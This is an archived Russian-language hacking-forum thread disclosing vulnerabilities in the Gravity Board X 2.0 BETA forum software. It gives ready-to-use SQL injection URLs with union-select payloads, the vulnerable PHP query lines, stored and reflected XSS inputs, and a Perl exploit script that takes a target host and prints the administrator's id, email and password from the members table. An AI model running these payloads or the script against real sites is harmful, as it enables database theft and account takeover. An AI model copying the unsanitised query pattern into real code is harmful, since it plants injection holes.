PDA

Просмотр полной версии : Gravity Board X


Ctacok
10.11.2009, 07:20
Название: Gravity Board X
Офф. сайт: http://www.gravityboardx.com
Версия: 2.0 BETA (Public Release 3)

SQL Иньекция.
/index.php?action=viewprofile&member_id=-2'+union+select+concat_ws(0x3a,user(),database(),v ersion())+--+
Уязвимый код:

$miquery = mysql_query("SELECT * FROM " . $prefix . "members WHERE memberid = '{$_GET['member_id']}'") OR DIE("Gravity Board X was unable get the member data requested from the members database: " . mysql_error());

index.php?action=viewpm&imid=-1'+union+select+concat_ws(0x3a,user(),database(),v ersion()),2,3,4,5,6,7,8,9,10+--+
Уязвимый код:
$imquery = mysql_query("SELECT * FROM " . $prefix . "ims WHERE imid='{$_GET['imid']}' AND imto='{$_SESSION['memberid']}'", $connection) OR DIE("Gravity Board X was unable to retrieve your personal message from the database: " . mysql_error());

/index.php?action=viewboard&board_id=-2'+union+select+1,concat_ws(0x3a,user(),database() ,version()),3+--+


Активная XSS.
/index.php?action=newpm
В поле Message(Сообщение).
<script>alert();</script>
И отправляем.

/index.php?action=postnew&board_id=[Номер категории]
Имя: Bla
Message: <script>alert();</script>

Пассивная XSS

/index.php?action=viewthread&thread_id="><script>alert()</script>

Ctacok
26.02.2010, 14:29
Опубликовал сплойт Gravity Board X 2.0 BETA (Public Release 3) SQL INJECTION EXPLOIT (http://ctacok.ru/?p=121)
#!/usr/bin/perl
use LWP::Simple;
print "\n";
print "################################################## ############\n";
print "# Gravity Board X 2.0 BETA (Public Release 3) SQL INJECTION #\n";
print "# Author: Ctacok (Russian) #\n";
print "# Blog : www.Ctacok.ru #\n";
print "# Special for Antichat (forum.antichat.ru) and xakep.ru #\n";
print "# Big Thanks to Slip :) #\n";
print "# Require : Magic_quotes = Off #\n";
print "################################################## ############\n";
if (@ARGV < 2)
{
print "\n Usage: exploit.pl [host] [path] ";
print "\n EX : exploit.pl www.localhost.com /path/ prefix \n\n";
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$prefix=$ARGV[2]; # PREFIX TABLES, Default: gbx
$vuln = "-2'+union+select+concat(0x3a3a3a,memberid,0x3a,emai l,0x3a,pw,0x3a3a3a)+from+".$prefix."_members";
$doc = get($host.$path."index.php?action=viewprofile&member_id=".$vuln."+--+");
if ($doc =~ /:::(.+):(.+):(.+):::/){
print "\n[+] Admin id: : $1";
print "\n[+] Admin email: $2";
print "\n[+] Admin password: $3";
}